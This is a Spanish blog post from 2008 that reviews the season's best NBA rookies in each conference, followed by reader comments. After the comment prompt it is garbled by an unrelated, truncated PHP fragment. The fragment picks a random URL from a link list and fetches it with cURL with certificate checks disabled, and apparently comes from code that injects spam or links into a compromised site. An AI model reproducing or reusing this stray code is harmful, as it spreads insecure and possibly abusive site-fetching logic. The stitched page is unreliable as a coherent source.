Seguimiento Rookies 2008-2009

09 de November de 2008 por Viva_Dirk

Empezamos con este artículo el seguimiento a los rookies de esta temporada que esperamos poder hacer cada viernes o sábado. Analizaremos el mejor quinteto de cada conferencia y mencionaremos las sorpresas y decepciones de la semana. Sin más dilación empezamos.

Conferencia Oeste

Russell Westbrook: El base de Oklahoma ha disputado menos minutos de los esperados, 21.3, en los que ha promediado 11.5 puntos y casi tantas pérdidas como asistencias. Hasta la fecha no ha demostrado sus cualidades defensivas excesivamente pero si ha dejado ver una mejora en el tiro exterior. Pese a todo esto es el mejor base novato de la conferencia.

OJ Mayo: Es el rookie que más minutos ha disputado con una media  de 38.4 por partido, donde ha dejado muestras de su capacidad anotadora con 16.8 puntos por encuentro. Además ha capturado 4 rebotes y robado 1.6 balones. Su punto negro son las 3 pérdidas de balón que promedia.

Rudy Fernandez: Gran inicio de Rudy a la altura de los picks mas altos del último draft, siendo utilizado por McMillan tras Roy y LaMarcus. Sus números son de 14.2 puntos en 27 minutos de juego, con grandes porcentajes y cuidando muy bien la pelota.

Jason Thompson: Aprovechando la ausencia de Brad Miller, el ex de Rider está demostrando que está preparado para rendir desde el primer minuto.13.6 puntos y 6.8 rebotes en 24 minutos, y un gran 58.8% en tiros de campo lo atestigua.

Marc Gasol: El hermano pequeño de Pau va a dejar muy pronto de ser conocido por eso. Máximo reboteador entre los novatos con 9.4 por partido, acompañado de 11.4 puntos y 1.4 tapones, además de un 55% en tiros de campo. Al igual que su compañero Mayo, su lunar son las 3 pérdidas de balón por partido, demasiadas para un hombre alto.

También merece una mención Darrell Arthur que completa el trío de rookies de Memphis y que se está conviertiendo una grata sorpresa con sus casi 7 puntos y 8 rebotes por encuentro.

Conferencia Este

Derrick Rose: El Nº1 del draft está dando motivos para ellos a los aficionados de los Bulls: 17.8 puntos, 3.7 rebotes, 4.5 asistencias y 1.2 robos son sus números, con un 48.8% en tiros de campo, todo eso en los 36 minutos que le da Del Negro. Como en otros, las 3 pérdidas son demasiadas, sobre todo con un número tan bajo de asistencias.

Mario Chalmers: El base de Miami ha tenido una adaptación inmediata a la liga a pesar de no ser tarea fácil llegar a un equipo con ciertas aspiraciones y hacerlo bien. En sus 4 primeros partidos ha promediado 8 puntos, 6 asistencias, 3.8 rebotes y 3.8 robos, tirando poco a canasta y cuidando bien el balón. Todo un robo de los Heat.

Michael Beasley: El favorito al rookie del año no está decepcionando y junto a Chalmers está siendo de gran ayuda para Wade. 17.6 puntos y 6.8 rebotes teniendo al lado a Shawn Marion no está nada mal aunque echamos en falta la cualidad de doblar balones.

Luc Mbah a Moute: La gran sorpresa del inicio de temporada. Elegido muy atrás se ha hecho con un hueco desde el primero minuto en los Bucks. En 25 minutos de juego ha hecho 8.6 puntos y 5 rebotes, desentonando únicamente en los tiros libres.

Brook Lopez: En 19 minutos sus 5.5 puntos, 6.5 rebotes y casi 2 tapones le dan para ser el center titular del Este. La competencia con otros dos jóvenes como Boone y Williams puede venirle bien, ya que ninguno tiene el puesto asegurado.

DJ Augustine, con sus 9.2 puntos a las órdenes de Larry Brown merece que lo nombremos. Milicic puede dar fe de lo difícil que es ser rookie bajo la tutela de Brown.

Comenta

7 comentarios a esta entrada

  1. arivas dice:
    #1

    Me está soprendiendo lo bien que han empezado este año los rookies, esperemos que sigan por este camino.
    Los “nuestros” con muchos minutos y siendo importantes desde el primer día. Realmente yo no esperaba que empezaran tan bien, especialmente Rudy con tanta competencia en Portland (a pesar de la baja de Webster)

      Citar

  2. Kantonyo dice:
    #2

    Me sorprende las pocas oportunidades de Anthony Randolph en Warriors, solo ha jugado dos partidos hasta la fecha con 9 min por partido, creo que es uno de los jugadores con mayor proyección de esta gran generación en la NBA.

    Tambien hay varios jugadores, que no han tenido las oportunidades necesarias para demostrar su talento, y que hay que seguir esperando para ver si pueden aportar a sus equipos, yo sigo confiando en ellos: Eric Gordon (Clippers), Joe Alexander (Bucks), Roy Hibbert (Pacers) o JJ Hickson (Cavs).

    Sorpresas: Jason Thompson (Kings), Mbah a Moute (Bucks) y Ryan Anderson (Nets)
    Decepciones: Brook Lopez(Nets) y Robin Lopez (Suns) y Westbrook (Thunder)
    Desaparecidos: Gallinari (NY), Oden (Blazers) y Bayless (Blazers).

      Citar

  3. Fran Reyes dice:
    #3

    Para mí, Brook López está siendo un tanto decepcionante. A pesar de que la cifra de rebotes, tapones y minutos está siendo más que buena, yo esperaba que anotara un poco más. Sobre todo en una franquicia como los Nets, donde sólo el decadente Vince Carter tiene el suficiente peso específico como para acaparar una parte representativa de los tiros

      Citar

  4. MagicJohnson32 dice:
    #4

    A ver si Eric Gordon va teniendo más oportunidades, que lo que le he visto me ha gustado, y forma una pareja muy buena junto a Baron. Anoche lo hizo muy bien contra los Mavs. Además, quitarse a Cuttino de la vista siempre es un descanso, qué poco me gusta.

      Citar

  5. Jabho dice:
    #5

    La hornada de este año pinta muy bien. Para mi lo más sorprendente es lo de Bayless y la poca bola que esté teniendo. Proyectaba top-5, se fue al 11 y sin oportunidades en los Blazers. Cuando vuelva Webster aún jugará menos.

    En lo positivo, además de los mejores que mas o menos se esperaban, Arthur. Mucho curro y muchas ganas a un equipo que es lo que mas necesita. Buen compañero para Marc.

    Y reconocer a OJ Mayo. No me gustaba y de momento no va mal.

      Citar

  6. kospeten dice:
    #6

    kevin love komo lo sta aciendo¿?

      Citar

  7. admin dice:
    #7

    Si revisas un seguimiento a los Rookies mas actual, veras que Kevin Love de momento esta decepcionando un poco aunq ahora ha encarrilado un par de buenos partidos. Creo q le falta adaptación pero loe sobra calidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>